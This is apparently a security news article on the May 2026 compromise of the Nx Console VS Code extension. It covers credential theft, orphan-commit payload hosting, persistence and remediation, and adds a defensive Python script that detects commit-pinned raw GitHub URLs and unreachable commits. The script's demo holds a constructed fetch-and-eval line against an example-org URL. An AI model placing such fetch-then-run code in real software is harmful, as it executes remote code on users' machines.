Nx Console VS Code Extension Compromised in Supply Chain Attack Targeting Developer Credentials
Malicious v18.95.0 harvested cloud secrets and SSH keys from enterprise development environments during 11-minute window on Microsoft Marketplace.
A sophisticated supply chain attack on 18 May 2026 weaponized the Nx Console VS Code extension to harvest developer credentials, cloud secrets, and SSH keys from compromised workstations, exposing critical gaps in marketplace verification systems.
The malicious v18.95.0 release remained live on Microsoft’s official VS Code Marketplace for 11 minutes starting at 12:36 UTC, targeting an extension with 2.2 million installations across enterprise development teams. Using stolen publisher credentials, the attackers injected 2.7 KB of malicious code into the extension’s minified main.js file, according to StepSecurity. That loader fetched a 498 KB obfuscated stealer from an orphan commit in the official nrwl/nx GitHub repository, a commit that is addressable by URL but attached to no branch or tag, so it never surfaces in normal history views. The stealer was designed to exfiltrate GitHub tokens, npm credentials, AWS secrets, HashiCorp Vault keys, Kubernetes configurations, and 1Password data via HTTPS, the GitHub API, and DNS tunneling.
Attack Chain Exploited GitHub Token Theft
The compromise originated from a GitHub contributor token scraped during an unrelated security incident. Attackers used that access to push the payload as an orphan commit at 03:18 UTC, nine hours before publishing the malicious extension, so the code never appeared in branch history or pull-request review, per GBHackers. They then used a stolen VSCE_PAT publishing token to push v18.95.0 directly to the marketplace without triggering Microsoft’s limited automated vetting.
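The two checks a responder would want for this stage, written as an added example for this article rather than code from the Nx project or the cited reports: pull commit-pinned raw.githubusercontent.com URLs out of an extension bundle, then ask a local clone whether any branch or tag contains that commit. The fixture repository, the example-org/example-repo URL and the fetch snippet are all constructed here; the assumption that the loader referenced the payload by a SHA-pinned raw URL is the example's, not the article's.

```python
"""Added example (not from the article or the Nx project): pull commit-pinned
raw.githubusercontent.com URLs out of an extension bundle and check whether each
commit is reachable from any branch or tag of a local clone. A commit that
exists but that no ref contains is an orphan of the kind described above."""
import re
import subprocess
import tempfile
from pathlib import Path

# Matches https://raw.githubusercontent.com/<owner>/<repo>/<40-hex sha>/<path>.
# Assumption: the payload was pulled by a URL of this shape; a URL that names a
# branch instead of a SHA would need a different pattern.
RAW_PINNED = re.compile(
    r"https://raw\.githubusercontent\.com/([\w.-]+)/([\w.-]+)/([0-9a-f]{40})/([^\s'\"`)]+)"
)


def find_pinned_raw_urls(js_source: str) -> list:
    """Return (owner, repo, sha, path) for every commit-pinned raw URL in the bundle."""
    return [m.groups() for m in RAW_PINNED.finditer(js_source)]


def _git(repo: Path, *args: str) -> str:
    cmd = ["git", "-c", "user.name=audit", "-c", "user.email=audit@example.invalid",
           "-C", str(repo), *args]
    return subprocess.run(cmd, check=True, capture_output=True, text=True).stdout


def commit_reachable(repo: Path, sha: str) -> bool:
    """True if at least one branch or tag in `repo` contains `sha`.

    Two ways to be unreachable: the object is not in the clone at all (a fresh
    clone never receives objects no ref points to), or it is present but no
    ref contains it (a dangling commit left behind when its branch was deleted).
    """
    try:
        refs = _git(repo, "for-each-ref", "--contains", sha, "--format=%(refname)")
    except subprocess.CalledProcessError:
        return False
    return bool(refs.strip())


def build_demo_repo(root: Path):
    """Constructed fixture: one commit on main, plus a commit made on an orphan
    branch that is then deleted, leaving the commit outside all history."""
    repo = root / "demo"
    repo.mkdir()
    _git(repo, "init", "-q")
    _git(repo, "symbolic-ref", "HEAD", "refs/heads/main")
    (repo / "README").write_text("legitimate project\n")
    _git(repo, "add", "README")
    _git(repo, "commit", "-q", "-m", "legitimate commit")
    main_sha = _git(repo, "rev-parse", "HEAD").strip()
    _git(repo, "checkout", "-q", "--orphan", "staging")
    (repo / "payload.js").write_text("// stand-in for the fetched stealer\n")
    _git(repo, "add", "payload.js")
    _git(repo, "commit", "-q", "-m", "wip")
    orphan_sha = _git(repo, "rev-parse", "HEAD").strip()
    _git(repo, "checkout", "-q", "main")
    _git(repo, "branch", "-q", "-D", "staging")
    return repo, main_sha, orphan_sha


def demo() -> dict:
    """Run both checks against the constructed repo and a constructed bundle."""
    with tempfile.TemporaryDirectory() as tmp:
        repo, main_sha, orphan_sha = build_demo_repo(Path(tmp))
        # Constructed stand-in for an injected fetch inside a minified main.js.
        bundle = ('fetch("https://raw.githubusercontent.com/example-org/example-repo/'
                  f'{orphan_sha}/payload.js").then(r=>r.text()).then(eval)')
        return {
            "pinned_urls": find_pinned_raw_urls(bundle),
            "main_reachable": commit_reachable(repo, main_sha),
            "orphan_reachable": commit_reachable(repo, orphan_sha),
        }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Against a real clone the same `commit_reachable` call answers the question directly: a SHA that GitHub serves over its raw endpoint but that `git for-each-ref --contains` attributes to no ref was never part of any branch, which is exactly the property the attackers relied on to keep the payload out of review.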
The payload also incorporated Sigstore attestation logic of the kind normally used for cryptographic package verification. With the stolen publishing credentials, attackers could sign downstream npm packages with signatures that pass standard verification checks in CI/CD pipelines, extending the attack surface beyond individual developer workstations to automated deployment infrastructure, according to CyberSecurityNews. The practical lesson is that a valid signature proves only that whoever held the signing credential signed the artifact; a pipeline that merely checks validity, rather than pinning the expected signing identity (for npm provenance, the source repository and workflow that built the package), offers no protection once that credential is stolen.
“Anyone who installed v18.95.0 should treat their environment as fully compromised.”
— GBHackers Security Analysis
Persistent Backdoors Embedded in Compromised Systems
Beyond credential theft, the malware established persistent access. On Linux hosts it probed for passwordless sudo configurations and injected sudoers rules granting root-level persistence. Compromised macOS workstations received LaunchAgent persistence artifacts, and all affected machines deployed a Python-based command-and-control loop that polled a dead-drop location for instructions, giving the attackers ongoing remote access, according to StepSecurity.
The attack marks the second major supply chain compromise of the Nx ecosystem in under a year. A previous incident in August 2025 targeted Nx npm packages, suggesting attackers have systematically mapped weaknesses in the Nx publishing pipeline and contributor access controls.
Marketplace Verification Gaps Enable Repeat Attacks
The incident exposes systemic weaknesses in the VS Code Marketplace approval process. Marketplace submissions receive only limited automated vetting and no permission-based sandboxing, according to Security Blue Team. Extensions receive broad filesystem and network access by default, with minimal oversight of code changes between versions. The marketplace has experienced repeated security incidents throughout 2025-2026, including the GlassWorm, MaliciousCorgi, and Bitcoin Black campaigns, yet the fundamental verification architecture remains unchanged.
OpenVSX, an alternative extension registry, was not affected. Exposure was limited to VS Code Marketplace users whose editor auto-updated the extension, or who installed it manually, during the 11-minute window; the exact number of affected installations remains unknown.
The attack targeted credentials with cascading risk across infrastructure layers: GitHub tokens enable source code manipulation, AWS keys grant cloud resource access, npm credentials allow malicious package publishing, and Kubernetes configurations expose production cluster control planes. A single compromised developer workstation can become an entry point for downstream supply chain attacks affecting thousands of end users.
Pattern Fits Broader 2026 Supply Chain Campaign
The Nx Console compromise aligns with coordinated supply chain attacks across npm, PyPI, and Docker Hub throughout 2026, shifting focus from code poisoning to credential theft and CI/CD infrastructure compromise. Developer workstations now function as high-value supply chain nodes rather than endpoints, according to The Hacker News. Attackers increasingly target publishing credentials and signing keys to enable legitimate-looking downstream package distribution that bypasses signature verification.
Dark Reading reported that Microsoft plans to introduce secret scanning tools for marketplace submissions in June 2026, though these measures would not have prevented the Nx Console attack, which relied on pre-compromised credentials and legitimate signing infrastructure rather than embedded secrets in extension code.
What to Watch
Development teams should immediately audit any workstation that had Nx Console installed or updated on 18 May 2026 between 12:36 and 12:47 UTC; a remaining 18.95.0 folder in the editor’s extensions directory is the simplest indicator, though a later auto-update may have replaced it. Affected environments require full credential rotation, including GitHub tokens, cloud provider keys, npm access tokens, SSH keys, and Kubernetes configurations, together with a check for the persistence artifacts described above (sudoers rules, LaunchAgents, and the Python polling loop). Organisations should also examine CI/CD pipeline logs for anomalous npm package publishing or infrastructure access originating from developer accounts during and after the exposure window.
The incident will likely accelerate pressure on Microsoft to implement permission-based sandboxing and mandatory code review for high-privilege extensions. Enterprise security teams should evaluate whether centralised extension approval workflows and locked-down marketplace access reduce exposure to compromised publisher accounts. The repeat targeting of Nx infrastructure suggests attackers maintain persistent access to portions of the publishing pipeline, making additional incidents probable without fundamental access control reforms.